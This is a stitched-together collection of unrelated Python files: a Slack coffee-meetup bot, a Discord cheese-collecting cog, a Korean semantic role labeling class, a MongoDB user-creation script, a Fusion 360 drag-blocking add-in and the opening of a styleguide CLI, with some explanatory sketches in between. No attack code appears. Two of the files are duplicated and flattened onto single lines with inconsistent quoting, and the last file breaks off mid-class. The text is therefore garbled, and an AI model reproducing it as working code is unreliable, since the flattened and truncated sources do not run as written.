                        "title_link": f"https://meet.jit.si/ur-mingla-{uuid.uuid4().hex}",
                        "text": f"Förslag på ämnen är {self.get_subjects()}",
                        "footer": f"{users}",
                    }
                )
        if len(list_of_reaction_members) >= self.config["group_size"]:
            attach.append(
                {
                    "fallback": "TODO",
                    "color": "#9803fc",
                    "title": "Information om hur botten funkar",
                    # TODO: change below to UR related git repo
                    "title_link": "https://git.svt.se/stbe02/mingla/-/blob/master/README.md",
                    "text": self.config["texts"]["footer"],
                    "footer": f"Dagens tips: {self.get_tips()}",
                }
            )
        try:
            self.client.chat_postMessage(
                username="mingla",
                channel=self.config["environments"][self.bot_env]["channel"],
                icon_emoji=":coffee:",
                text=text,
                attachments=attach,
            )
        except SlackApiError as e:
            assert e.response["ok"] is False
            assert e.response["error"]
            print(f"Got an error: {e.response['error']}")

    def add_reaction(self, message, reaction):
        self.client.reactions_add(
            channel=self.config["environments"][self.bot_env]["channel"],
            timestamp=message["ts"],
            name=reaction,
        )

    def remove_reaction(self, message, reaction):
        self.client.reactions_remove(
            channel=self.config["environments"][self.bot_env]["channel"],
            timestamp=message["ts"],
            name=reaction,
        )

    def get_reactions(self, message):
        message = self.client.reactions_get(
            channel=self.config["environments"][self.bot_env]["channel"],
            timestamp=message["ts"],
        )
        return message["message"].get("reactions", [])

    def get_reaction(self, message, reaction):
        for r in self.get_reactions(message):
            if r["name"] == reaction:
                return r

    def get_users_reaction(self, message, reaction):
        r = self.get_reaction(message, reaction)
        if r:
            return r["users"]
        return []

    def find_daily_reaction_message(self):
        response = self.client.conversations_history(
            channel=self.config["environments"][self.bot_env]["channel"]
        )
        for message in response["messages"]:
            yday = datetime.now().timetuple().tm_yday
            if (
                message.get("user") == self.config["bot_id"]
                and re.match(fr"^VOTE {yday}.*", message["text"]) is not None
            ):
                return message

    def list_active_users_in_room(self):
        if self.bot_env == "production":
            list_of_online_members = []
        else:
            # use your own userid for development
            list_of_online_members = ["U06LM2VJ8"] * int(random.random() * 10)
        response = self.client.conversations_members(
            channel=self.config["environments"][self.bot_env]["channel"]
        )
        if response.get("ok"):
            for member in response.get("members", []):
                r = self.client.users_getPresence(user=member)
                if r.get("ok") and r.get("presence") == "active":
                    list_of_online_members.append(member)
        return list_of_online_members

    def send_message(self, text):
        try:
            response = self.client.chat_postMessage(
                username="mingla",
                channel=self.config["environments"][self.bot_env]["channel"],
                icon_emoji=":coffee:",
                text=text,
            )
            return response
        except SlackApiError as e:
            assert e.response["ok"] is False
            assert e.response["error"]
            print(f"Got an error: {e.response['error']}")
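# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the bot above): n_even_chunks() is what
# splits opted-in members into coffee groups. invite_members_to_room() asks
# for len(members) // group_size chunks, so every chunk gets at least
# group_size members and the remainder is spread as evenly as possible. The
# function is restated here so the snippet runs on its own, and the member ids
# are fake.

def n_even_chunks(lst, n):
    """Yield n chunks from lst, as evenly sized as possible."""
    last = 0
    for i in range(1, n + 1):
        cur = int(round(i * (len(lst) / n)))
        yield lst[last:cur]
        last = cur


members = [f"U{i:02d}" for i in range(10)]  # ten fake Slack user ids
group_size = 4
print(list(n_even_chunks(members, len(members) // group_size)))
# -> [['U00', 'U01', 'U02', 'U03', 'U04'], ['U05', 'U06', 'U07', 'U08', 'U09']]
# ---------------------------------------------------------------------------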
"""This is a cog for a discord.py bot. It drops random cheese for people to pick up """ from collections import defaultdict from datetime import datetime as dt from discord import Activity, Client, DMChannel, Embed, Message from discord.ext import commands import asyncio import json import random class Cheese(commands.Cog, command_attrs=dict(hidden=True)): def __init__(self, client, **kwargs): self.client = client self.client.log.info("loading ze cheese!") #Config self.config = dict() self.config['debug'] = kwargs.get("debug", False) self.config['store_file'] = kwargs.get("store_file",'cheese_store.json') self.config['cheese_weight'] = kwargs.get("cheese_weight", 30) self.cheese_weight = (100 - self.config['cheese_weight'], 100) #Emoji Storage in Unicode self.emojis = dict() self.emojis['cheese_emoji'] = u"\U0001F9C0" self.emojis['thumbup_emoji'] = u"\U0001F44D" self.emojis['thumbdown_emoji'] = u"\U0001F44E" #Timer between cheese drops self.last_cheese = dt.utcnow() self.cooldown = 30 #Initialize the score memory self.scores_store = self.load_memory() #Warm up the randomizer random.seed() async def save_memory(self): try: with open(self.config['store_file'], 'w', encoding='utf-8') as f: json.dump(dict(self.scores_store), f) except Exception as e: self.client.log.warning(f"Unable to save cheese memory! : {e}") finally: if self.config['debug']: self.client.log.info(f"{await self.list_current_store_users()}") async def list_current_store_users(self, limit=5): output = [] counter = 1 for k, v in sorted(self.scores_store.items(), key=lambda x: x[1], reverse=True): output.append(f"{counter}. {await self.client.fetch_user(int(k))}: {v}") if counter > limit: break counter += 1 return output def load_memory(self): try: with open(self.config['store_file'], 'r', encoding='utf-8') as f: scores = defaultdict(int) scores.update(json.load(f)) return scores except Exception as e: self.client.log.warning( f"Unable to load cheese memory from file! : {e}") return defaultdict(int) async def add_cheese(self, client: Client, msg: Message): message = 'A wild cheese appeared!' await msg.channel.send(message) await msg.add_reaction(self.emojis['cheese_emoji']) await msg.channel.send(await self.check_reaction(client, msg)) async def check_reaction(self, client: Client, msg: Message): def check(reaction, user): return not user.bot \ and msg.id == reaction.message.id \ and str(reaction.emoji) == self.emojis['cheese_emoji'] message_store = "" try: reaction, user = await client.wait_for('reaction_add', timeout=60.0, check=check) await reaction.clear() self.scores_store[str(user.id)] += 1 await self.save_memory() message_store += f"{self.emojis["thumbup_emoji"]} {user} collected the cheese!" 
return message_store except asyncio.TimeoutError: message_store += f"{self.emojis["thumbdown_emoji"]} nobody collected the cheese" return message_store @commands.Cog.listener() async def on_message(self, msg: Message): if msg.author.bot or isinstance(msg.channel, DMChannel): # Ignore DM or mesage from a bot return client = self.client chance_result = random.choices( [0, 1], cum_weights=self.cheese_weight)[0] client.log.debug(f"{chance_result=}") if chance_result: if (dt.utcnow() - self.last_cheese).total_seconds() < self.cooldown: return self.last_cheese = dt.utcnow() await self.add_cheese(client, msg) @commands.command() async def scores(self, ctx, *, limit=5): """Get cheese scores""" scores = "\n".join(await self.list_current_store_users()) e = Embed(title='Cheese collected', description=scores, color=0xFF8000) await ctx.send(embed=e) def setup(client): """This is called when the cog is loaded via load_extension""" client.add_cog(Cheese(client))
"""This is a cog for a discord.py bot. It drops random cheese for people to pick up """ from collections import defaultdict from datetime import datetime as dt from discord import Activity, Client, DMChannel, Embed, Message from discord.ext import commands import asyncio import json import random class Cheese(commands.Cog, command_attrs=dict(hidden=True)): def __init__(self, client, **kwargs): self.client = client self.client.log.info("loading ze cheese!") #Config self.config = dict() self.config['debug'] = kwargs.get("debug", False) self.config['store_file'] = kwargs.get("store_file",'cheese_store.json') self.config['cheese_weight'] = kwargs.get("cheese_weight", 30) self.cheese_weight = (100 - self.config['cheese_weight'], 100) #Emoji Storage in Unicode self.emojis = dict() self.emojis['cheese_emoji'] = u"\U0001F9C0" self.emojis['thumbup_emoji'] = u"\U0001F44D" self.emojis['thumbdown_emoji'] = u"\U0001F44E" #Timer between cheese drops self.last_cheese = dt.utcnow() self.cooldown = 30 #Initialize the score memory self.scores_store = self.load_memory() #Warm up the randomizer random.seed() async def save_memory(self): try: with open(self.config['store_file'], 'w', encoding='utf-8') as f: json.dump(dict(self.scores_store), f) except Exception as e: self.client.log.warning(f"Unable to save cheese memory! : {e}") finally: if self.config['debug']: self.client.log.info(f"{await self.list_current_store_users()}") async def list_current_store_users(self, limit=5): output = [] counter = 1 for k, v in sorted(self.scores_store.items(), key=lambda x: x[1], reverse=True): output.append(f"{counter}. {await self.client.fetch_user(int(k))}: {v}") if counter > limit: break counter += 1 return output def load_memory(self): try: with open(self.config['store_file'], 'r', encoding='utf-8') as f: scores = defaultdict(int) scores.update(json.load(f)) return scores except Exception as e: self.client.log.warning( f"Unable to load cheese memory from file! : {e}") return defaultdict(int) async def add_cheese(self, client: Client, msg: Message): message = 'A wild cheese appeared!' await msg.channel.send(message) await msg.add_reaction(self.emojis['cheese_emoji']) await msg.channel.send(await self.check_reaction(client, msg)) async def check_reaction(self, client: Client, msg: Message): def check(reaction, user): return not user.bot \ and msg.id == reaction.message.id \ and str(reaction.emoji) == self.emojis['cheese_emoji'] message_store = "" try: reaction, user = await client.wait_for('reaction_add', timeout=60.0, check=check) await reaction.clear() self.scores_store[str(user.id)] += 1 await self.save_memory() message_store += f"{self.emojis['thumbup_emoji']} {user} collected the cheese!" 
return message_store except asyncio.TimeoutError: message_store += f"{self.emojis['thumbdown_emoji']} nobody collected the cheese" return message_store @commands.Cog.listener() async def on_message(self, msg: Message): if msg.author.bot or isinstance(msg.channel, DMChannel): # Ignore DM or mesage from a bot return client = self.client chance_result = random.choices( [0, 1], cum_weights=self.cheese_weight)[0] client.log.debug(f"{chance_result=}") if chance_result: if (dt.utcnow() - self.last_cheese).total_seconds() < self.cooldown: return self.last_cheese = dt.utcnow() await self.add_cheese(client, msg) @commands.command() async def scores(self, ctx, *, limit=5): """Get cheese scores""" scores = "\n".join(await self.list_current_store_users()) e = Embed(title='Cheese collected', description=scores, color=0xFF8000) await ctx.send(embed=e) def setup(client): """This is called when the cog is loaded via load_extension""" client.add_cog(Cheese(client))
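# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the cog above): the drop chance hinges on
# random.choices() with cumulative weights. cheese_weight = (100 - 30, 100)
# = (70, 100) means outcome 0 covers the cumulative range 0-70 and outcome 1
# the range 70-100, i.e. a 30 % chance of a cheese drop per message. A
# standalone check of that distribution:

import random

cheese_weight = (70, 100)  # (100 - cheese_weight_config, 100), as in __init__
trials = 100_000
drops = sum(random.choices([0, 1], cum_weights=cheese_weight)[0] for _ in range(trials))
print(f"observed drop rate: {drops / trials:.3f}")  # should be close to 0.300
# ---------------------------------------------------------------------------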
"""Semantic Role Labeling related modeling class""" from copy import deepcopy from typing import List, Optional from pororo.tasks.utils.base import PororoFactoryBase, PororoSimpleBase class PororoSrlFactory(PororoFactoryBase): """ Conduct semantic role labeling Korean (`charbert.base.ko.srl`) - dataset: UCorpus - metric: TBU - ref: http://nlplab.ulsan.ac.kr/doku.php?id=start Args: sent: (str) sentence to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation Examples: >>> srl = Pororo(task="srl", lang="ko") >>> srl("카터는 역삼에서 카카오브레인으로 출근한다.") [[('카터는', 'AGT'), ('역삼에서', 'LOC'), ('카카오브레인으로', 'GOL'), ('출근한다.', 'PREDICATE')]] >>> srl("피고인은 거제에서 400만 원 상당의 순금목걸이를 피해자로부터 강취하였다.") [[('피고인은', 'AGT'), ('거제에서', '-'), ('400만', '-'), ('원', '-'), ('상당의', '-'), ('순금목걸이를', 'THM'), ('피해자로부터', 'SRC'), ('강취하였다.', 'PREDICATE')]] """ def __init__(self, task: str, lang: str, model: Optional[str]): super().__init__(task, lang, model) @staticmethod def get_available_langs(): return ["ko"] @staticmethod def get_available_models(): return {"ko": ["charbert.base.ko.srl"]} def load(self, device: str): """ Load user-selected task-specific model Args: device (str): device information Returns: object: User-selected task-specific model """ if "charbert" in self.config.n_model: from pororo.models.brainbert import RobertaLabelModel from pororo.tasks import PororoPosFactory model = RobertaLabelModel.load_model( f"bert/{self.config.n_model}", self.config.lang, ).eval().to(device) tagger = PororoPosFactory( task="pos", model="mecab-ko", lang=self.config.lang, ).load(device) return PororoBertSRL(model, tagger, self.config) class PororoBertSRL(PororoSimpleBase): def __init__(self, model, tagger, config): super().__init__(config) self._tagger = tagger self._model = model self._verbs = ["VV", "VA", "XSV", "XSA", "VCN"] def _split_list(self, lst: List, seperator: str): """ Split list using seperator Args: lst (list): PoS tagger pair list seperator (str): seperator token Returns: list: splitted list of list """ res = [] tmp = [] for elem in lst: if elem[0] == seperator: res.append(tmp) tmp = [] continue tmp.append(elem) res.append(tmp) return res def _preprocess(self, sent: str) -> str: """ Preprocess semantic role labeling input to specify predicate Args: sent (str): input sentence Returns: str: preprocessed input """ words = self._split_list([list(tag) for tag in self._tagger(sent)], " ") vs = [] for i, word in enumerate(words): for morph in word: if morph[1] in self._verbs: vs.append(i) break sents = [] for v in vs: morphs = deepcopy(words) morphs[v][0][0] = f"★{morphs[v][0][0]}" sent, seg = str(), str() for elems in morphs: for pair in elems: morph, tag = pair tag = f"{tag} " if morph == " ": sent += "▁ " seg += tag continue chars = [c for c in morph] sent += f"{" ".join(chars)} " seg += tag * len(chars) sent += "▁ " seg += "SPACE " sents.append((sent.strip(), seg.strip())) return sents def _postprocess(self, result: List, origin: str): """ Postprocess semantic role labeling model inference result Args: result (List): inferenced semantic roles origin (str): original query string Returns: List[Tuple]: postprocessed result """ tokens = origin.split() fin = [] for res in result: res = self._split_list(res, "▁") tmp = [] for i, token in enumerate(tokens): if "★" in res[i][0][0]: tmp.append((token, "PREDICATE")) continue tmp.append((token, res[i][0][1])) fin.append(tmp) return fin def predict(self, sent: str): """ Conduct semantic role labeling Args: sent: (str) sentence 
to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation """ preproc = self._preprocess(sent) if not preproc: return "There is NO predicate to be labeled" res = [] for p in preproc: res.append(self._model.predict_srl(p[0], p[1])) return self._postprocess(res, sent)
"""Semantic Role Labeling related modeling class""" from copy import deepcopy from typing import List, Optional from pororo.tasks.utils.base import PororoFactoryBase, PororoSimpleBase class PororoSrlFactory(PororoFactoryBase): """ Conduct semantic role labeling Korean (`charbert.base.ko.srl`) - dataset: UCorpus - metric: TBU - ref: http://nlplab.ulsan.ac.kr/doku.php?id=start Args: sent: (str) sentence to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation Examples: >>> srl = Pororo(task="srl", lang="ko") >>> srl("카터는 역삼에서 카카오브레인으로 출근한다.") [[('카터는', 'AGT'), ('역삼에서', 'LOC'), ('카카오브레인으로', 'GOL'), ('출근한다.', 'PREDICATE')]] >>> srl("피고인은 거제에서 400만 원 상당의 순금목걸이를 피해자로부터 강취하였다.") [[('피고인은', 'AGT'), ('거제에서', '-'), ('400만', '-'), ('원', '-'), ('상당의', '-'), ('순금목걸이를', 'THM'), ('피해자로부터', 'SRC'), ('강취하였다.', 'PREDICATE')]] """ def __init__(self, task: str, lang: str, model: Optional[str]): super().__init__(task, lang, model) @staticmethod def get_available_langs(): return ["ko"] @staticmethod def get_available_models(): return {"ko": ["charbert.base.ko.srl"]} def load(self, device: str): """ Load user-selected task-specific model Args: device (str): device information Returns: object: User-selected task-specific model """ if "charbert" in self.config.n_model: from pororo.models.brainbert import RobertaLabelModel from pororo.tasks import PororoPosFactory model = RobertaLabelModel.load_model( f"bert/{self.config.n_model}", self.config.lang, ).eval().to(device) tagger = PororoPosFactory( task="pos", model="mecab-ko", lang=self.config.lang, ).load(device) return PororoBertSRL(model, tagger, self.config) class PororoBertSRL(PororoSimpleBase): def __init__(self, model, tagger, config): super().__init__(config) self._tagger = tagger self._model = model self._verbs = ["VV", "VA", "XSV", "XSA", "VCN"] def _split_list(self, lst: List, seperator: str): """ Split list using seperator Args: lst (list): PoS tagger pair list seperator (str): seperator token Returns: list: splitted list of list """ res = [] tmp = [] for elem in lst: if elem[0] == seperator: res.append(tmp) tmp = [] continue tmp.append(elem) res.append(tmp) return res def _preprocess(self, sent: str) -> str: """ Preprocess semantic role labeling input to specify predicate Args: sent (str): input sentence Returns: str: preprocessed input """ words = self._split_list([list(tag) for tag in self._tagger(sent)], " ") vs = [] for i, word in enumerate(words): for morph in word: if morph[1] in self._verbs: vs.append(i) break sents = [] for v in vs: morphs = deepcopy(words) morphs[v][0][0] = f"★{morphs[v][0][0]}" sent, seg = str(), str() for elems in morphs: for pair in elems: morph, tag = pair tag = f"{tag} " if morph == " ": sent += "▁ " seg += tag continue chars = [c for c in morph] sent += f"{' '.join(chars)} " seg += tag * len(chars) sent += "▁ " seg += "SPACE " sents.append((sent.strip(), seg.strip())) return sents def _postprocess(self, result: List, origin: str): """ Postprocess semantic role labeling model inference result Args: result (List): inferenced semantic roles origin (str): original query string Returns: List[Tuple]: postprocessed result """ tokens = origin.split() fin = [] for res in result: res = self._split_list(res, "▁") tmp = [] for i, token in enumerate(tokens): if "★" in res[i][0][0]: tmp.append((token, "PREDICATE")) continue tmp.append((token, res[i][0][1])) fin.append(tmp) return fin def predict(self, sent: str): """ Conduct semantic role labeling Args: sent: (str) sentence 
to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation """ preproc = self._preprocess(sent) if not preproc: return "There is NO predicate to be labeled" res = [] for p in preproc: res.append(self._model.predict_srl(p[0], p[1])) return self._postprocess(res, sent)
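# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the class above): _split_list() regroups a
# flat PoS-tagger output into words by splitting on the " " (space) pair that
# mecab-style taggers emit between words. A standalone version with invented
# tagger output -- the morphemes and tags below are for illustration only:

def split_list(lst, separator):
    res, tmp = [], []
    for elem in lst:
        if elem[0] == separator:
            res.append(tmp)
            tmp = []
            continue
        tmp.append(elem)
    res.append(tmp)
    return res


tagged = [("카터", "NNP"), ("는", "JX"), (" ", "SPACE"), ("출근", "NNG"), ("한다", "XSV")]
print(split_list(tagged, " "))
# -> [[('카터', 'NNP'), ('는', 'JX')], [('출근', 'NNG'), ('한다', 'XSV')]]
# ---------------------------------------------------------------------------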
#!/usr/bin/env python3

"""
Script to create MongoDb users for X-Road Metrics tools.
"""
# The MIT License
# Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS)
# Copyright (c) 2017-2020 Estonian Information System Authority (RIA)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

import string
import secrets

import yaml

user_roles = {
    'analyzer': {'query_db': 'read', 'analyzer_database': 'readWrite'},
    'analyzer_interface': {'query_db': 'read', 'analyzer_database': 'readWrite'},
    'anonymizer': {'query_db': 'read', 'anonymizer_state': 'readWrite'},
    'collector': {'query_db': 'readWrite', 'collector_state': 'readWrite'},
    'corrector': {'query_db': 'readWrite'},
    'reports': {'query_db': 'read', 'reports_state': 'readWrite'}
}

admin_roles = {
    'root': ['root'],
    'backup': ['backup'],
    'superuser': ['root']
}


def create_users(args, client):
    passwords = {}
    _create_admin_users(args, client, passwords)
    _create_opmon_users(args, client, passwords)
    _print_users(passwords)


def _create_admin_users(args, client, passwords):
    if not args.generate_admins:
        return

    for user_name, roles in admin_roles.items():
        try:
            password = user_name if args.dummy_passwords else _generate_password()
            client.admin.command('createUser', user_name, pwd=password, roles=roles)
            passwords[user_name] = password
        except Exception as e:
            print(f"Failed to create user {user_name}: {e}")


def _create_opmon_users(args, client, passwords):
    for user, roles in user_roles.items():
        user_name = f'{user}_{args.xroad}'
        role_list = [{'db': f'{db}_{args.xroad}', 'role': role} for db, role in roles.items()]
        password = user_name if args.dummy_passwords else _generate_password()

        try:
            client.auth_db.command('createUser', user_name, pwd=password, roles=role_list)
            passwords[user_name] = password
        except Exception as e:
            print(f"Failed to create user {user_name}: {e}")


def _print_users(passwords: dict):
    if len(passwords) == 0:
        print("No users created.")
        return

    width = max([len(k) for k in passwords.keys()]) + 1
    width = max(width, len("Username"))

    print("\nGenerated the following users: \n")
    print(f'{"Username":<{width}}| {"Password":<{13}}| Escaped Password')
    print(f'{width * "-"}+{"-" * 14}+{"-" * 20}')
    for user, password in passwords.items():
        print(f'{user:<{width}}| {password} | {_escape_password(password)}')


def _generate_password():
    """
    Generate a random 12 character password.

    Password contains lower-case, upper-case, numbers and special characters.
    Based on best-practice recipe from https://docs.python.org/3/library/secrets.html.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        password = ''.join(secrets.choice(alphabet) for _ in range(12))
        if (any(c.islower() for c in password)
                and any(c.isupper() for c in password)
                and sum(c.isdigit() for c in password) >= 3
                and any(c in string.punctuation for c in password)):
            return password


def _escape_password(password):
    return yaml.dump(password, default_style='"').strip()
#Author-Thomas Axelsson, ZXYNINE
#Description-Blocks Component Dragging in parametric mode

# This file is part of NoComponentDrag, a Fusion 360 add-in for blocking
# component drags.
#
# Copyright (c) 2020 Thomas Axelsson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import adsk.core, adsk.fusion, adsk.cam, traceback
import math, os, operator, time
from collections import deque

NAME = 'NoComponentDrag'
FILE_DIR = os.path.dirname(os.path.realpath(__file__))

# Import relatively to avoid namespace pollution
from .thomasa88lib import utils, events, manifest, error

# Force modules to be fresh during development
import importlib
importlib.reload(utils)
importlib.reload(events)
importlib.reload(manifest)
importlib.reload(error)

ENABLE_CMD_ID = 'thomasa88_NoComponentDrag_Enable'
DIRECT_EDIT_DRAG_CMD_ID = 'FusionDragCompControlsCmd'

app_ = None
ui_ = None

error_catcher_ = error.ErrorCatcher()
events_manager_ = events.EventsManager(error_catcher_)
manifest_ = manifest.read()

select_panel_ = None
enable_cmd_def_ = None
parametric_environment_ = True
addin_updating_checkbox_ = False
fusion_drag_controls_cmd_def_ = None


def command_starting_handler(args: adsk.core.ApplicationCommandEventArgs):
    # Should we block?
    if (parametric_environment_
            and args.commandId == 'FusionDragComponentsCommand'
            and not get_direct_edit_drag_enabled()):
        args.isCanceled = True


def command_terminated_handler(args: adsk.core.ApplicationCommandEventArgs):
    # Detect if the user toggles Direct Edit or enters/leaves a Base Feature.
    # Undo/Redo triggers the ActivateEnvironmentCommand instead.
    # PLM360OpenAttachmentCommand and CurrentlyOpenDocumentsCommand are workarounds
    # for the DocumentActivated-with-Drawings bug:
    # https://forums.autodesk.com/t5/fusion-360-api-and-scripts/api-bug-application-documentactivated-event-do-not-raise/m-p/9020750
    if (args.commandId in ('ActivateEnvironmentCommand',
                           'PLM360OpenAttachmentCommand',
                           'CurrentlyOpenDocumentsCommand')
            or (args.terminationReason == adsk.core.CommandTerminationReason.CompletedTerminationReason
                and args.commandId in ('Undo', 'Redo',
                                       'ConvertToPMDesignCommand', 'ConvertToDMDesignCommand',
                                       'BaseFeatureActivate', 'BaseFeatureStop',
                                       'BaseFeatureCreationCommand'))):
        check_environment()


# This handler is called three times per window switch, only two times when
# first starting, and only once when trying to insert a derive.
def document_activated_handler(args: adsk.core.WorkspaceEventArgs):
    check_environment()


def enable_cmd_created_handler(args: adsk.core.CommandCreatedEventArgs):
    global addin_updating_checkbox_
    # Check if we are updating the checkbox programmatically, to avoid infinite event recursion
    if addin_updating_checkbox_:
        return
    checkbox_def: adsk.core.CheckBoxControlDefinition = args.command.parentCommandDefinition.controlDefinition
    set_direct_edit_drag_enabled(checkbox_def.isChecked)


def set_direct_edit_drag_enabled(value):
    '''Sets Fusion's "Component Drag" checkbox to the given value'''
    fusion_drag_controls_cmd_def_.controlDefinition.isChecked = value


def get_direct_edit_drag_enabled():
    '''Gets the value of Fusion's "Component Drag" checkbox'''
    return fusion_drag_controls_cmd_def_.controlDefinition.isChecked


def check_environment():
    global enable_cmd_def_, parametric_environment_
    is_parametric = is_parametric_mode()
    if parametric_environment_ == is_parametric:
        # Environment did not change
        return
    parametric_environment_ = is_parametric

    # Hide/show our menu command to avoid showing two Component Drag menu items
    # in direct edit mode (our command + Fusion's command).
    enable_cmd_def_.controlDefinition.isVisible = is_parametric

    # We only need to update the checkbox in parametric mode, as it will not be
    # seen in direct edit mode.
    if is_parametric and enable_cmd_def_.controlDefinition.isChecked != get_direct_edit_drag_enabled():
        # Fusion crashes if we change isChecked from (one of?) the event handlers,
        # so we put the update at the end of the event queue.
        events_manager_.delay(update_checkbox)


def update_checkbox():
    global addin_updating_checkbox_
    # Only set the checkbox value (triggering a command creation) if the
    # direct edit value has actually changed
    direct_edit_drag = get_direct_edit_drag_enabled()
    if enable_cmd_def_.controlDefinition.isChecked != direct_edit_drag:
        addin_updating_checkbox_ = True
        enable_cmd_def_.controlDefinition.isChecked = direct_edit_drag
        addin_updating_checkbox_ = False


def is_parametric_mode():
    try:
        # UserInterface.ActiveWorkspace throws when it is called from DocumentActivatedHandler
        # during Fusion 360 start-up(?). Checking for app_.isStartupComplete does not help.
        if ui_.activeWorkspace.id == 'FusionSolidEnvironment':
            design = adsk.fusion.Design.cast(app_.activeProduct)
            if design and design.designType == adsk.fusion.DesignTypes.ParametricDesignType:
                return True
    except Exception:
        pass
    return False


def clear_ui_item(item):
    if item:
        item.deleteMe()


def run(context):
    # Expose global variables inside of the function
    global app_, ui_, enable_cmd_def_, select_panel_, fusion_drag_controls_cmd_def_
    with error_catcher_:
        app_ = adsk.core.Application.get()
        ui_ = app_.userInterface
        fusion_drag_controls_cmd_def_ = ui_.commandDefinitions.itemById('FusionDragCompControlsCmd')

        # Clear any previous enable_cmd_def
        clear_ui_item(ui_.commandDefinitions.itemById(ENABLE_CMD_ID))

        # There are multiple select panels. Pick the right one.
        select_panel_ = ui_.toolbarPanelsByProductType('DesignProductType').itemById('SelectPanel')

        enabled = get_direct_edit_drag_enabled()
        # Use a Command to get a transaction when renaming
        enable_cmd_def_ = ui_.commandDefinitions.addCheckBoxDefinition(
            ENABLE_CMD_ID,
            'Component Drag',
            'Enables or disables the movement of components by dragging '
            'in the canvas.\n\n'
            f'({NAME} v {manifest_["version"]})\n',
            enabled)
        events_manager_.add_handler(enable_cmd_def_.commandCreated,
                                    callback=enable_cmd_created_handler)

        # Remove the old control
        clear_ui_item(select_panel_.controls.itemById(ENABLE_CMD_ID))
        select_panel_.controls.addCommand(enable_cmd_def_, DIRECT_EDIT_DRAG_CMD_ID, False)

        events_manager_.add_handler(ui_.commandStarting, callback=command_starting_handler)
        events_manager_.add_handler(ui_.commandTerminated, callback=command_terminated_handler)

        # Fusion bug: DocumentActivated is not called when switching to/from Drawing.
        # https://forums.autodesk.com/t5/fusion-360-api-and-scripts/api-bug-application-documentactivated-event-do-not-raise/m-p/9020750
        events_manager_.add_handler(app_.documentActivated, callback=document_activated_handler)

        # Workspace is not ready when starting (?)
        if app_.isStartupComplete:
            check_environment()
        # Checking the workspace type in the DocumentActivated handler fails since
        # Fusion 360 v2.0.10032. Put a check at the end of the event queue instead.
        events_manager_.delay(check_environment)


def stop(context):
    with error_catcher_:
        events_manager_.clean_up()

        # Remove the old control
        clear_ui_item(select_panel_.controls.itemById(ENABLE_CMD_ID))
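# A minimal sketch of the single mechanism the add-in above relies on, using
# only API members that already appear in this file; 'block_drag' is a
# hypothetical handler name for illustration.
def block_drag(args: adsk.core.ApplicationCommandEventArgs):
    # A commandStarting handler may veto a command before it runs by setting
    # isCanceled on the event args; everything else in this add-in is
    # bookkeeping to keep its checkbox in sync with Fusion's own setting.
    if args.commandId == 'FusionDragComponentsCommand':
        args.isCanceled = True
# Registration would mirror run() above, e.g.:
#   events_manager_.add_handler(ui_.commandStarting, callback=block_drag)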
import contextlib
import logging
import pathlib
from io import StringIO

import click
import flake8.main.application
import toml

from ni_python_styleguide import _acknowledge_existing_errors


def _qs_or_vs(verbosity):
    if verbosity != 0:
        return f"-{'v' * verbosity if verbosity > 0 else 'q' * abs(verbosity)}"
    return ""


def _read_pyproject_toml(ctx, param, value):
    value = value or "pyproject.toml"  # Only accept a local pyproject.toml if not specified
    try:
        pyproject_data = toml.load(value)
    except FileNotFoundError:
        return None
    except (toml.TomlDecodeError, OSError) as e:
        raise click.FileError(filename=value, hint=f"Error reading configuration file: {e}")

    ctx.ensure_object(dict)
    ctx.obj["PYPROJECT"] = pyproject_data

    config = pyproject_data.get("tool", {}).get("ni-python-styleguide", {})
    config.pop("quiet", None)
    config.pop("verbose", None)

    if ctx.default_map is None:
        ctx.default_map = {}
    ctx.default_map.update(config)

    return value


def _get_application_import_names(pyproject):
    """Return the application import names from the config."""
    # Use the name explicitly specified in the config, if any
    app_name = (
        pyproject.get("tool", {})
        .get("ni-python-styleguide", {})
        .get("application-import-names", "")
    )
    # Allow the poetry name as a fallback
    if not app_name:
        app_name = pyproject.get("tool", {}).get("poetry", {}).get("name", "").replace("-", "_")
    return f"{app_name},tests"


class ConfigGroup(click.Group):
    """click.Group subclass which allows for a config option to load options from."""

    def __init__(self, *args, **kwargs):
